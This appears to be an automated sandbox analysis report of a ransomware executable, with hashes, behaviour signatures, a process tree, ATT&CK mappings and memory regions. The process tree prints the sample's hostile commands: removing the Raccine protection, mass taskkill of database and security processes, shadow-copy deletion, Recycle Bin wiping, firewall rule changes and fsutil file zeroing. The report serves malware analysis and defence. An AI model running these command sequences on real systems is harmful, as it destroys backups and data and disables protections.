Resubmissions

28-10-2021 15:44

211028-s6m55agfbk 10

10-10-2021 17:01

211010-vjzlragafj 8

Analysis

  • max time kernel
    125s
  • max time network
    127s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    28-10-2021 15:44

General

  • Target

    iE8JUAJp7.bin.exe

  • Size

    385KB

  • MD5

    a9a0fae4766d9f7cafa1560f5f62e46f

  • SHA1

    d582608dc07bd9f771334cdb60626755997dd56c

  • SHA256

    f70966e32d18a1e2ed51ebdcc6b985d8f7613febf0680639076c71ebeab6a350

  • SHA512

    5c2f89a16c5291d509f41bd5f12d18a386892738cfd5fb5cbd2156c52d46f28abde5f199461fe9a8bf3aa3f7e4644fe66c3ad48c3b114b792efdbf421468856b

Malware Config

Signatures

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Downloads PsExec from SysInternals website 1 IoCs

    Sysinternals tools like PsExec are often leveraged maliciously by malware families due to being commonly used by testers/administrators.

  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 5 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 2 IoCs
  • Drops file in Windows directory 13 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 58 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 60 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\iE8JUAJp7.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\iE8JUAJp7.bin.exe"
    1⤵
    • Modifies extensions of user files
    • Enumerates connected drives
    • Modifies WinLogon
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    • System policy modification
    PID:2636
    • C:\Windows\SysWOW64\taskkill.exe
      "taskkill" /F /IM RaccineSettings.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:516
    • C:\Windows\SysWOW64\reg.exe
      "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
      2⤵
        PID:1988
      • C:\Windows\SysWOW64\reg.exe
        "reg" delete HKCU\Software\Raccine /F
        2⤵
        • Modifies registry key
        PID:3092
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks" /DELETE /TN "Raccine Rules Updater" /F
        2⤵
          PID:2224
        • C:\Windows\SysWOW64\netsh.exe
          "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
          2⤵
          • Drops file in Windows directory
          PID:3488
        • C:\Windows\SysWOW64\sc.exe
          "sc.exe" config Dnscache start= auto
          2⤵
            PID:2280
          • C:\Windows\SysWOW64\sc.exe
            "sc.exe" config SQLTELEMETRY start= disabled
            2⤵
              PID:732
            • C:\Windows\SysWOW64\sc.exe
              "sc.exe" config FDResPub start= auto
              2⤵
                PID:2888
              • C:\Windows\SysWOW64\sc.exe
                "sc.exe" config SSDPSRV start= auto
                2⤵
                  PID:208
                • C:\Windows\SysWOW64\sc.exe
                  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                  2⤵
                    PID:376
                  • C:\Windows\SysWOW64\sc.exe
                    "sc.exe" config SstpSvc start= disabled
                    2⤵
                      PID:720
                    • C:\Windows\SysWOW64\sc.exe
                      "sc.exe" config upnphost start= auto
                      2⤵
                        PID:2440
                      • C:\Windows\SysWOW64\sc.exe
                        "sc.exe" config SQLWriter start= disabled
                        2⤵
                          PID:504
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mspub.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1056
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mspub.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2244
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM synctime.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1160
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM Ntrtscan.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4032
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mydesktopqos.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2124
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mysqld.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3608
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM sqbcoreservice.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1040
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mydesktopservice.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3264
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM agntsvc.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3920
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM isqlplussvc.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3188
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM firefoxconfig.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1240
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM thebat.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3864
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM steam.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3660
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM onenote.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2404
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM sqlwriter.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3956
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM ocomm.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3936
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM encsvc.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1136
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM infopath.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4088
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM tbirdconfig.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3688
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM PccNTMon.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:956
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM excel.exe /F
                          2⤵
                          • Kills process with taskkill
                          PID:1796
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mbamtray.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2312
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM msaccess.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:968
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM dbeng50.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3892
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM CNTAoSMgr.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3400
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM zoolz.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3448
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM outlook.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1436
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM thebat64.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:1012
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" IM thunderbird.exe /F
                          2⤵
                          • Kills process with taskkill
                          PID:2196
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM tmlisten.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3820
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM dbsnmp.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3580
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM wordpad.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:676
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM msftesql.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:608
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM xfssvccon.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:3320
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM mysqld-opt.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:892
                        • C:\Windows\SysWOW64\taskkill.exe
                          "taskkill.exe" /IM powerpnt.exe /F
                          2⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2224
                        • C:\Windows\SysWOW64\netsh.exe
                          "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
                          2⤵
                            PID:3464
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mydesktopqos.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1752
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM ocautoupds.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1680
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM visio.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1796
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM ocssd.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3656
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM mydesktopservice.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2996
                          • C:\Windows\SysWOW64\taskkill.exe
                            "taskkill.exe" /IM oracle.exe /F
                            2⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3520
                          • C:\Windows\SysWOW64\arp.exe
                            "arp" -a
                            2⤵
                              PID:1008
                            • C:\Windows\SysWOW64\taskkill.exe
                              "taskkill.exe" /IM winword.exe /F
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3208
                            • C:\Windows\SysWOW64\taskkill.exe
                              "taskkill.exe" /IM sqlagent.exe /F
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:872
                            • C:\Windows\SysWOW64\taskkill.exe
                              "taskkill.exe" /IM mysqld-nt.exe /F
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2872
                            • C:\Windows\SysWOW64\taskkill.exe
                              "taskkill.exe" /IM sqlbrowser.exe /F
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1332
                            • C:\Windows\SysWOW64\taskkill.exe
                              "taskkill.exe" /IM sqlservr.exe /F
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3780
                            • C:\Windows\SysWOW64\taskkill.exe
                              "taskkill.exe" /IM ragent.exe /f
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2876
                            • C:\Windows\SysWOW64\taskkill.exe
                              "taskkill.exe" /IM rmngr.exe /f
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1552
                            • C:\Windows\SysWOW64\taskkill.exe
                              "taskkill.exe" /IM rphost.exe /f
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3132
                            • C:\Windows\SysWOW64\taskkill.exe
                              "taskkill.exe" /IM 1cv8.exe /f
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2420
                            • C:\Windows\SysWOW64\taskkill.exe
                              "taskkill.exe" /IM sql.exe /f
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1696
                            • C:\Windows\SysWOW64\taskkill.exe
                              "taskkill.exe" /IM sqld.exe /f
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3544
                            • C:\Windows\SysWOW64\taskkill.exe
                              "taskkill.exe" /IM mysql.exe /f
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3000
                            • C:\Windows\SysWOW64\taskkill.exe
                              "taskkill.exe" /IM mysqld.exe /f
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1368
                            • C:\Windows\SysWOW64\taskkill.exe
                              "taskkill.exe" /IM oracle.exe /f
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3864
                            • C:\Windows\SysWOW64\taskkill.exe
                              "taskkill.exe" /IM vmwp.exe /f
                              2⤵
                              • Kills process with taskkill
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2364
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
                              2⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2964
                            • C:\Windows\SysWOW64\cmd.exe
                              "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\\$Recycle.bin
                              2⤵
                                PID:816
                              • C:\Windows\SysWOW64\netsh.exe
                                "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                                2⤵
                                  PID:3580
                                • C:\Windows\SysWOW64\netsh.exe
                                  "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
                                  2⤵
                                    PID:3128
                                  • C:\Windows\SysWOW64\arp.exe
                                    "arp" -a
                                    2⤵
                                      PID:916
                                    • C:\Windows\SysWOW64\notepad.exe
                                      "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\Инструкция.txt
                                      2⤵
                                        PID:1552
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                                        2⤵
                                          PID:604
                                          • C:\Windows\SysWOW64\PING.EXE
                                            ping 127.0.0.7 -n 3
                                            3⤵
                                            • Runs ping.exe
                                            PID:3680
                                          • C:\Windows\SysWOW64\fsutil.exe
                                            fsutil file setZeroData offset=0 length=524288 “%s”
                                            3⤵
                                              PID:1192
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\iE8JUAJp7.bin.exe
                                            2⤵
                                              PID:2776
                                          • C:\Windows\splwow64.exe
                                            C:\Windows\splwow64.exe 12288
                                            1⤵
                                              PID:3860

                                            Network

                                            MITRE ATT&CK Matrix ATT&CK v6

                                            Persistence

                                            Modify Existing Service

                                            1
                                            T1031

                                            Winlogon Helper DLL

                                            1
                                            T1004

                                            Defense Evasion

                                            Modify Registry

                                            3
                                            T1112

                                            Discovery

                                            Query Registry

                                            1
                                            T1012

                                            Peripheral Device Discovery

                                            1
                                            T1120

                                            System Information Discovery

                                            2
                                            T1082

                                            Remote System Discovery

                                            1
                                            T1018

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • C:\Users\Admin\Desktop\Инструкция.txt
                                              MD5

                                              0de8310ecc6e7e0793cab8357e98e823

                                              SHA1

                                              f93ee3bd5ec1170068a11a83a96d19dcf6e1d068

                                              SHA256

                                              74dc43243f8d53d043fc9390f23a1008316f6c0b257a6fc2d0b41022814a962c

                                              SHA512

                                              dc81bc2faeb9cb7a260ba3fef5cbc5a7517f1390e841f196ec5e10e446b31f10bb0be9cf94a0423228a0b7ddf124b41e12549592fb6761dfc4da424ee6450ca4

                                            • memory/208-127-0x0000000000000000-mapping.dmp
                                            • memory/376-128-0x0000000000000000-mapping.dmp
                                            • memory/504-131-0x0000000000000000-mapping.dmp
                                            • memory/516-118-0x0000000000000000-mapping.dmp
                                            • memory/608-164-0x0000000000000000-mapping.dmp
                                            • memory/676-163-0x0000000000000000-mapping.dmp
                                            • memory/720-129-0x0000000000000000-mapping.dmp
                                            • memory/732-125-0x0000000000000000-mapping.dmp
                                            • memory/872-177-0x0000000000000000-mapping.dmp
                                            • memory/892-166-0x0000000000000000-mapping.dmp
                                            • memory/956-151-0x0000000000000000-mapping.dmp
                                            • memory/968-154-0x0000000000000000-mapping.dmp
                                            • memory/1008-175-0x0000000000000000-mapping.dmp
                                            • memory/1012-159-0x0000000000000000-mapping.dmp
                                            • memory/1040-138-0x0000000000000000-mapping.dmp
                                            • memory/1056-132-0x0000000000000000-mapping.dmp
                                            • memory/1136-148-0x0000000000000000-mapping.dmp
                                            • memory/1160-134-0x0000000000000000-mapping.dmp
                                            • memory/1240-142-0x0000000000000000-mapping.dmp
                                            • memory/1332-179-0x0000000000000000-mapping.dmp
                                            • memory/1436-158-0x0000000000000000-mapping.dmp
                                            • memory/1552-182-0x0000000000000000-mapping.dmp
                                            • memory/1680-170-0x0000000000000000-mapping.dmp
                                            • memory/1752-169-0x0000000000000000-mapping.dmp
                                            • memory/1796-171-0x0000000000000000-mapping.dmp
                                            • memory/1796-152-0x0000000000000000-mapping.dmp
                                            • memory/1988-120-0x0000000000000000-mapping.dmp
                                            • memory/2124-136-0x0000000000000000-mapping.dmp
                                            • memory/2196-160-0x0000000000000000-mapping.dmp
                                            • memory/2224-122-0x0000000000000000-mapping.dmp
                                            • memory/2224-167-0x0000000000000000-mapping.dmp
                                            • memory/2244-133-0x0000000000000000-mapping.dmp
                                            • memory/2280-124-0x0000000000000000-mapping.dmp
                                            • memory/2312-153-0x0000000000000000-mapping.dmp
                                            • memory/2404-145-0x0000000000000000-mapping.dmp
                                            • memory/2440-130-0x0000000000000000-mapping.dmp
                                            • memory/2636-210-0x0000000009400000-0x0000000009401000-memory.dmp
                                              Filesize

                                              4KB

                                            • memory/2636-209-0x000000000AB20000-0x000000000AB21000-memory.dmp
                                              Filesize

                                              4KB

                                            • memory/2636-115-0x0000000000290000-0x0000000000291000-memory.dmp
                                              Filesize

                                              4KB

                                            • memory/2636-119-0x00000000052C0000-0x00000000052C1000-memory.dmp
                                              Filesize

                                              4KB

                                            • memory/2636-117-0x0000000004AF0000-0x0000000004AF1000-memory.dmp
                                              Filesize

                                              4KB

                                            • memory/2872-178-0x0000000000000000-mapping.dmp
                                            • memory/2876-181-0x0000000000000000-mapping.dmp
                                            • memory/2888-126-0x0000000000000000-mapping.dmp
                                            • memory/2964-192-0x0000000007072000-0x0000000007073000-memory.dmp
                                              Filesize

                                              4KB

                                            • memory/2964-190-0x0000000007EC0000-0x0000000007EC1000-memory.dmp
                                              Filesize

                                              4KB

                                            • memory/2964-187-0x0000000007580000-0x0000000007581000-memory.dmp
                                              Filesize

                                              4KB

                                            • memory/2964-185-0x0000000004B00000-0x0000000004B01000-memory.dmp
                                              Filesize

                                              4KB

                                            • memory/2964-183-0x0000000004A00000-0x0000000004A01000-memory.dmp
                                              Filesize

                                              4KB

                                            • memory/2964-208-0x0000000004A00000-0x0000000004A01000-memory.dmp
                                              Filesize

                                              4KB

                                            • memory/2964-207-0x0000000007074000-0x0000000007076000-memory.dmp
                                              Filesize

                                              8KB

                                            • memory/2964-184-0x0000000004A00000-0x0000000004A01000-memory.dmp
                                              Filesize

                                              4KB

                                            • memory/2964-206-0x0000000007073000-0x0000000007074000-memory.dmp
                                              Filesize

                                              4KB

                                            • memory/2964-196-0x0000000004A00000-0x0000000004A01000-memory.dmp
                                              Filesize

                                              4KB

                                            • memory/2964-195-0x00000000085F0000-0x00000000085F1000-memory.dmp
                                              Filesize

                                              4KB

                                            • memory/2964-194-0x0000000008350000-0x0000000008351000-memory.dmp
                                              Filesize

                                              4KB

                                            • memory/2964-188-0x0000000007620000-0x0000000007621000-memory.dmp
                                              Filesize

                                              4KB

                                            • memory/2964-186-0x00000000076B0000-0x00000000076B1000-memory.dmp
                                              Filesize

                                              4KB

                                            • memory/2964-191-0x0000000007070000-0x0000000007071000-memory.dmp
                                              Filesize

                                              4KB

                                            • memory/2964-193-0x0000000008210000-0x0000000008211000-memory.dmp
                                              Filesize

                                              4KB

                                            • memory/2996-173-0x0000000000000000-mapping.dmp
                                            • memory/3092-121-0x0000000000000000-mapping.dmp
                                            • memory/3188-141-0x0000000000000000-mapping.dmp
                                            • memory/3208-176-0x0000000000000000-mapping.dmp
                                            • memory/3264-139-0x0000000000000000-mapping.dmp
                                            • memory/3320-165-0x0000000000000000-mapping.dmp
                                            • memory/3400-156-0x0000000000000000-mapping.dmp
                                            • memory/3448-157-0x0000000000000000-mapping.dmp
                                            • memory/3464-168-0x0000000000000000-mapping.dmp
                                            • memory/3488-123-0x0000000000000000-mapping.dmp
                                            • memory/3520-174-0x0000000000000000-mapping.dmp
                                            • memory/3580-162-0x0000000000000000-mapping.dmp
                                            • memory/3608-137-0x0000000000000000-mapping.dmp
                                            • memory/3656-172-0x0000000000000000-mapping.dmp
                                            • memory/3660-144-0x0000000000000000-mapping.dmp
                                            • memory/3688-150-0x0000000000000000-mapping.dmp
                                            • memory/3780-180-0x0000000000000000-mapping.dmp
                                            • memory/3820-161-0x0000000000000000-mapping.dmp
                                            • memory/3864-143-0x0000000000000000-mapping.dmp
                                            • memory/3892-155-0x0000000000000000-mapping.dmp
                                            • memory/3920-140-0x0000000000000000-mapping.dmp
                                            • memory/3936-147-0x0000000000000000-mapping.dmp
                                            • memory/3956-146-0x0000000000000000-mapping.dmp
                                            • memory/4032-135-0x0000000000000000-mapping.dmp
                                            • memory/4088-149-0x0000000000000000-mapping.dmp